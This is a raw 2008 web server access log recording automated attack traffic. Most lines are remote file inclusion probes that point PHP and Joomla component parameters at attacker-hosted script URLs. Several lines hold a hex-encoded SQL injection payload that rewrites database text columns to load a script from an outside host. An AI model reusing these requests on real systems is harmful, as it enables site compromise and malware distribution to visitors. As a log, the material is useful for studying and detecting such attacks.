89.111.176.116 - - [30/Aug/2008:00:11:53 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
89.111.176.116 - - [30/Aug/2008:00:11:53 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
75.127.70.16 - - [30/Aug/2008:00:11:56 -0400] "GET /logs/error_log.Q108051900//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "libwww-perl/5.811"
89.111.176.116 - - [30/Aug/2008:00:12:00 -0400] "GET /logs/access_log.Q108081300/modules/My_eGallery/index.php?basepath=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
190.81.184.98 - - [30/Aug/2008:00:12:07 -0400] "GET /logs/access_log.Q108081900/adminfoot.php?path[docroot]=http://ontheribbon.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
190.81.184.98 - - [30/Aug/2008:00:12:07 -0400] "GET /logs/adminfoot.php?path[docroot]=http://ontheribbon.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
190.81.184.98 - - [30/Aug/2008:00:12:07 -0400] "GET /adminfoot.php?path[docroot]=http://ontheribbon.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
64.185.237.47 - - [30/Aug/2008:00:12:08 -0400] "GET /logs/error_log.Q108051900//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
200.53.114.42 - - [30/Aug/2008:00:12:09 -0400] "GET /logs/error_log.Q108071500/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 264 "-" "libwww-perl/5.76"
64.185.237.47 - - [30/Aug/2008:00:12:11 -0400] "GET /logs/error_log.Q108051900//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
200.53.114.42 - - [30/Aug/2008:00:12:19 -0400] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.76"
64.185.237.47 - - [30/Aug/2008:00:12:20 -0400] "GET /logs/error_log.Q108051900//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
200.53.114.42 - - [30/Aug/2008:00:12:23 -0400] "GET /logs/access_log.Q108071500/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:12:32 -0400] "GET /logs/error_log.Q108051700/inc/cmses/aedatingCMS.php?dir[inc]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:12:33 -0400] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 223 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:12:37 -0400] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.76"
209.59.12.99 - - [30/Aug/2008:00:12:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.53.114.42 - - [30/Aug/2008:00:12:41 -0400] "GET /logs/access_log.Q108061400//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:12:51 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.76"
89.111.176.116 - - [30/Aug/2008:00:13:29 -0400] "GET /logs/error_log.Q108050400//modules/vwar/admin/admin.php?vwar_root=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
194.109.22.118 - - [30/Aug/2008:00:13:44 -0400] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
194.109.22.118 - - [30/Aug/2008:00:13:44 -0400] "GET /logs/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
194.109.22.118 - - [30/Aug/2008:00:13:44 -0400] "GET /logs/error_log.Q108051800/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
200.25.180.198 - - [30/Aug/2008:00:13:50 -0400] "GET /logs/access_log.Q108081300/lostpasswd.php?env[include_prefix]=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
200.25.180.198 - - [30/Aug/2008:00:13:53 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
200.25.180.198 - - [30/Aug/2008:00:13:53 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
62.210.139.66 - - [30/Aug/2008:00:13:54 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
62.210.139.66 - - [30/Aug/2008:00:13:58 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
190.81.184.98 - - [30/Aug/2008:00:13:59 -0400] "GET /logs/access_log.Q108081100/adminfoot.php?path[docroot]=http://ontheribbon.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
200.53.114.42 - - [30/Aug/2008:00:14:01 -0400] "GET /logs/error_log.Q108061400//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.76"
62.210.139.66 - - [30/Aug/2008:00:14:02 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
85.17.6.7 - - [30/Aug/2008:00:14:09 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
200.53.114.42 - - [30/Aug/2008:00:14:10 -0400] "GET /logs/access_log.Q108062800//admin/classes/TplLoad.php?full_path_to_public_program=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:14:15 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:14:16 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 229 "-" "libwww-perl/5.76"
64.185.237.47 - - [30/Aug/2008:00:14:21 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
64.185.237.47 - - [30/Aug/2008:00:14:27 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
74.50.6.170 - - [30/Aug/2008:00:14:36 -0400] "GET /logs/error_log.Q108053000/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.wintaktrading.com/idzz.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.812"
12.214.80.238 - - [30/Aug/2008:00:13:03 -0400] "GET /logs/access_log.Q108060300?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 4709054 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; Zango 10.1.181.0)"
74.50.6.170 - - [30/Aug/2008:00:14:36 -0400] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.wintaktrading.com/idzz.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.812"
74.50.6.170 - - [30/Aug/2008:00:14:36 -0400] "GET /logs/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.wintaktrading.com/idzz.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.812"
75.127.70.16 - - [30/Aug/2008:00:14:37 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
64.185.237.47 - - [30/Aug/2008:00:14:37 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
12.214.80.238 - - [30/Aug/2008:00:13:03 -0400] "GET /logs/access_log.Q108060300?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 4709054 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; Zango 10.1.181.0)"
12.214.80.238 - - [30/Aug/2008:00:14:38 -0400] "GET /logs/access_log.Q108060700?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 491534 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; Zango 10.1.181.0)"
12.214.80.238 - - [30/Aug/2008:00:14:44 -0400] "GET /logs/access_log.Q108060700?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 491534 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; Zango 10.1.181.0)"
208.80.193.35 - - [30/Aug/2008:00:15:15 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {79E24C12-A737-838B-D6AE-AB8EB875A8C1}; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
62.210.139.66 - - [30/Aug/2008:00:15:18 -0400] "GET /logs/error_log.Q108062500//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
62.210.139.66 - - [30/Aug/2008:00:15:18 -0400] "GET /logs/error_log.Q108062500//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
62.210.139.66 - - [30/Aug/2008:00:15:18 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
62.210.139.66 - - [30/Aug/2008:00:15:18 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
62.210.139.66 - - [30/Aug/2008:00:15:18 -0400] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
200.68.35.77 - - [30/Aug/2008:00:15:18 -0400] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.donath.de/files/safeon.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
62.210.139.66 - - [30/Aug/2008:00:15:18 -0400] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
87.101.4.49 - - [30/Aug/2008:00:15:19 -0400] "GET /adminfoot.php?path[docroot]=http://www.comehackus.com/backup/idfx.txt??? HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
87.101.4.49 - - [30/Aug/2008:00:15:19 -0400] "GET /logs/access_log.Q108081900/adminfoot.php?path[docroot]=http://www.comehackus.com/backup/idfx.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
87.101.4.49 - - [30/Aug/2008:00:15:19 -0400] "GET /logs/adminfoot.php?path[docroot]=http://www.comehackus.com/backup/idfx.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
200.53.114.42 - - [30/Aug/2008:00:15:36 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.76"
62.210.139.66 - - [30/Aug/2008:00:15:36 -0400] "GET /logs/error_log.Q108062500//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
62.210.139.66 - - [30/Aug/2008:00:15:37 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
62.210.139.66 - - [30/Aug/2008:00:15:37 -0400] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
200.53.114.42 - - [30/Aug/2008:00:15:39 -0400] "GET /logs/error_log.Q108061600/index.php?redir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:15:40 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:15:40 -0400] "GET /index.php?redir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:15:41 -0400] "GET /logs/error_log.Q108033000//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:15:41 -0400] "GET /logs/index.php?redir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:15:41 -0400] "GET /logs/access_log.Q108081900/components/com_colorlab/admin.color.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 264 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:15:42 -0400] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:15:43 -0400] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.76"
66.249.71.231 - - [30/Aug/2008:00:15:44 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LBF55292424B48700F20803Z+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.53.114.42 - - [30/Aug/2008:00:15:44 -0400] "GET /logs/access_log.Q108062200/index.php?redir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.76"
211.202.2.15 - - [30/Aug/2008:00:16:20 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
75.127.70.16 - - [30/Aug/2008:00:16:46 -0400] "GET /logs/error_log.Q108081500//option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jofchurch.org/calendar//tools/mraneti.txt???? HTTP/1.1" 404 407 "-" "libwww-perl/5.811"
75.127.70.16 - - [30/Aug/2008:00:16:46 -0400] "GET //option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jofchurch.org/calendar//tools/mraneti.txt???? HTTP/1.1" 404 381 "-" "libwww-perl/5.811"
75.127.70.16 - - [30/Aug/2008:00:16:46 -0400] "GET /logs//option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jofchurch.org/calendar//tools/mraneti.txt???? HTTP/1.1" 404 386 "-" "libwww-perl/5.811"
85.17.6.7 - - [30/Aug/2008:00:16:58 -0400] "GET /logs/error_log.Q108081500//option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jofchurch.org/calendar//tools/mraneti.txt???? HTTP/1.1" 404 407 "-" "libwww-perl/5.79"
85.17.6.7 - - [30/Aug/2008:00:16:58 -0400] "GET //option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jofchurch.org/calendar//tools/mraneti.txt???? HTTP/1.1" 404 381 "-" "libwww-perl/5.79"
85.17.6.7 - - [30/Aug/2008:00:16:58 -0400] "GET /logs//option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jofchurch.org/calendar//tools/mraneti.txt???? HTTP/1.1" 404 386 "-" "libwww-perl/5.79"
200.53.114.42 - - [30/Aug/2008:00:17:08 -0400] "GET /logs/error_log.Q108051700//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:17:16 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:17:18 -0400] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.76"
85.17.6.7 - - [30/Aug/2008:00:17:20 -0400] "GET /logs/error_log.Q108081500//option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tripi-ddl.com/video/mraneti.txt? HTTP/1.1" 404 407 "-" "libwww-perl/5.79"
85.17.6.7 - - [30/Aug/2008:00:17:21 -0400] "GET //option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tripi-ddl.com/video/mraneti.txt? HTTP/1.1" 404 381 "-" "libwww-perl/5.79"
